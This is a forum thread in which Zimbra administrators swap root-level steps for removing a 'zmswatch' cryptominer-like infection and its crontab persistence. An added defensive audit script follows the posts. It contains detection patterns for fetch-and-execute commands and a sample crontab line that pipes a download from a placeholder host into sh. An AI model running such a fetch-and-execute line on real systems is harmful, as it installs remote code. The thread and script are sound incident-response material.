Zimbra AJAX Webmail not loading

conceicao_ti
Posts: 6
Joined: Wed Mar 22, 2017 6:12 pm

Re: Zimbra AJAX Webmail not loading

Postby conceicao_ti » Tue May 28, 2019 6:30 pm

Hello, I had the same problem. The fix was to stop the Zimbra service, check what is running with top -u zimbra, then kill the remaining processes, and then check the file permissions with the command
/opt/zimbra/libexec/zmfixperms -extended

delete the executables
zmswatch.sh and kthrotlds
rebuild the zimbra crontab


willian.barker
Posts: 5
Joined: Thu Dec 21, 2017 1:59 pm

Re: Zimbra AJAX Webmail not loading

Postby willian.barker » Tue May 28, 2019 6:45 pm

I meant to say it worked out for now. Until I find the correct way to fix the problem.

Do you have any method for me?
The process zmswatch is using very high CPU.

Thank you.
MaySky
Posts: 25
Joined: Sat Apr 02, 2016 6:57 am

Re: Zimbra AJAX Webmail not loading

Postby MaySky » Tue May 28, 2019 6:52 pm

koval1986 wrote:Who managed to overcome ZMWATCH completely without return. I have 4 hours and everything comes back! :( :( :( :(


I am. 22 hours without virus already.
Found new intrusion attempts in logs, but all the files in jetty folder are as on newly installed system disconnected from internet and no strange activity in top.
tmp and log folder is ok also.
Reverted back standard cron tasks as per instruction https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
Cron file is untouched from that time also.
Last edited by MaySky on Tue May 28, 2019 7:07 pm, edited 1 time in total.
conceicao_ti
Posts: 6
Joined: Wed Mar 22, 2017 6:12 pm

Re: Zimbra AJAX Webmail not loading

Postby conceicao_ti » Tue May 28, 2019 7:04 pm

Hello
Look, just kill the zmswatch process, locate zmswatch.sh and delete it, and block the IP too.

willian.barker wrote:I meant to say it worked out for now. Until I find the correct way to fix the problem.

Do you have any method for me?
The process zmswatch is using very high CPU.

Thank you.
conceicao_ti
Posts: 6
Joined: Wed Mar 22, 2017 6:12 pm

Re: Zimbra AJAX Webmail not loading

Postby conceicao_ti » Tue May 28, 2019 7:09 pm

If you do not locate the executable, it will go back to changing the crontab and deleting the Zimbra parameters.

MaySky wrote:
koval1986 wrote:Who managed to overcome ZMWATCH completely without return. I have 4 hours and everything comes back! :( :( :( :(


I am. 22 hours without virus already.
Found new intrusion attempts in logs, but all the files in jetty folder are as on newly installed system disconnected from internet and no strange activity in top.
tmp and log folder is ok also.
Reverted back standard cron tasks as per instruction https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
Cron file is untouched from that time also.
zimbraargentina
Posts: 5
Joined: Mon May 27, 2019 1:49 pm

Re: Zimbra AJAX Webmail not loading

Postby zimbraargentina » Tue May 28, 2019 7:20 pm

The final solution to remove zmswatch is

AS ROOT

ps -faxu to see the PID number of process
kill -9 PID

cd /opt/zimbra/log
rm -rf zmswatch
rm -rf zmswatch.sh

touch zmswatch
touch zmswatch.sh

chattr +i zmswatch
chattr +i zmswatch.sh

crontab -e -u zimbra
edit and remove the last line, if it exists, that calls zmswatch.sh
save and exit

and use TOP to see the CPU use.
the load average must go down in five minutes.

Thanks
Marcos
SDA Argentina
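
A read-only check for the persistence this thread describes, as an added example that is not part of any post: it flags crontab entries that call zmswatch.sh or kthrotlds or that fetch a script and hand it to a shell, and lists non-empty copies of those files. The function names, the sample crontab and the URL are constructed for illustration; only the file names come from the posts.

```shell
#!/bin/sh
# Added example (not from the thread). File names come from the posts;
# the sample crontab and URL below are constructed.
# Real use, as root:  crontab -l -u zimbra | audit_crontab

# A fetch tool followed on the same line by a hand-off to a shell.
FETCH_EXEC='(curl|wget).*(\||;|&&)[[:space:]]*(/[a-z/]*)?(ba)?sh([[:space:]]|$)'

# audit_crontab: crontab text on stdin -> "reason<TAB>line" per flagged entry.
# Returns 0 when nothing was flagged, 1 otherwise.
audit_crontab() {
    hits=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|'#'*) continue ;;                      # blank line or comment
            *zmswatch.sh*|*kthrotlds*)
                printf 'known-name\t%s\n' "$line"; hits=$((hits + 1)) ;;
            *)
                if printf '%s\n' "$line" | grep -Eq "$FETCH_EXEC"; then
                    printf 'fetch-and-exec\t%s\n' "$line"; hits=$((hits + 1))
                fi ;;
        esac
    done
    [ "$hits" -eq 0 ]
}

# dropped_files DIR: print the named files that exist AND are non-empty.
# Empty placeholders left by the touch + chattr +i step are not reported.
dropped_files() {
    for name in zmswatch zmswatch.sh kthrotlds; do
        [ -s "$1/$name" ] && printf '%s\n' "$1/$name"
    done
    return 0
}

# Constructed sample crontab: one ordinary entry, two of the kind described.
SAMPLE_CRONTAB='# constructed sample, not a real Zimbra crontab
*/2 * * * * /opt/zimbra/libexec/zmstatuslog
* * * * * /opt/zimbra/log/zmswatch.sh
*/5 * * * * wget -q -O - http://example.invalid/placeholder.sh | sh'

printf '%s\n' "$SAMPLE_CRONTAB" | audit_crontab || echo "crontab needs review"
```
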
conceicao_ti
Posts: 6
Joined: Wed Mar 22, 2017 6:12 pm

Re: Zimbra AJAX Webmail not loading

Postby conceicao_ti » Tue May 28, 2019 7:21 pm

Hello friend, even after doing this, something keeps trying to change the crontab. What I did was also remove the edit permission from the crontab file, because when it changes the file it deletes everything that is there and adds a command that downloads and executes another sh script.

zimbraargentina wrote:The final solution to remove zmswatch is

AS ROOT

ps -faxu to see the PID number of process
kill -9 PID

cd /opt/zimbra/log
rm -rf zmswatch
rm -rf zmswatch.sh

touch zmswatch
touch zmswatch.sh

chattr +i zmswatch
chattr +i zmswatch.sh

crontab -e -u zimbra
edit and remove the last line, if it exists, that calls zmswatch.sh
save and exit

and use TOP to see the CPU use.
the load average must go down in five minutes.

Thanks
Marcos
SDA Argentina
MaySky
Posts: 25
Joined: Sat Apr 02, 2016 6:57 am

Re: Zimbra AJAX Webmail not loading

Postby MaySky » Tue May 28, 2019 7:23 pm

zimbraargentina wrote:The final solution to remove zmswatch is

AS ROOT

ps -faxu to see the PID number of process
kill -9 PID

cd /opt/zimbra/log
rm -rf zmswatch
rm -rf zmswatch.sh

touch zmswatch
touch zmswatch.sh

chattr +i zmswatch
chattr +i zmswatch.sh

crontab -e -u zimbra
edit and remove the last line, if it exists, that calls zmswatch.sh
save and exit

and use TOP to see the CPU use.
the load average must go down in five minutes.

Thanks
Marcos
SDA Argentina


This will remove the active virus, but you should fix/remove all the files in the jetty folder that were compromised, as the attack vector will remain even if you patch with the latest patch.
zimbraargentina
Posts: 5
Joined: Mon May 27, 2019 1:49 pm

Re: Zimbra AJAX Webmail not loading

Postby zimbraargentina » Tue May 28, 2019 7:29 pm

Of Course

MaySky wrote:
zimbraargentina wrote:The final solution to remove zmswatch is

AS ROOT

ps -faxu to see the PID number of process
kill -9 PID

cd /opt/zimbra/log
rm -rf zmswatch
rm -rf zmswatch.sh

touch zmswatch
touch zmswatch.sh

chattr +i zmswatch
chattr +i zmswatch.sh

crontab -e -u zimbra
edit and remove the last line, if it exists, that calls zmswatch.sh
save and exit

and use TOP to see the CPU use.
the load average must go down in five minutes.

Thanks
Marcos
SDA Argentina


This will remove the active virus, but you should fix/remove all the files in the jetty folder that were compromised, as the attack vector will remain even if you patch with the latest patch.
jme1924
Posts: 3
Joined: Sat May 25, 2019 8:33 pm

Re: Zimbra AJAX Webmail not loading

Postby jme1924 » Tue May 28, 2019 9:13 pm

Hello everyone.

A question: when you say to delete all the files in the jetty folder, does that mean the ones on the first level of the folder, or does the complete content, including subdirectories, have to be deleted as well?

Thanks...
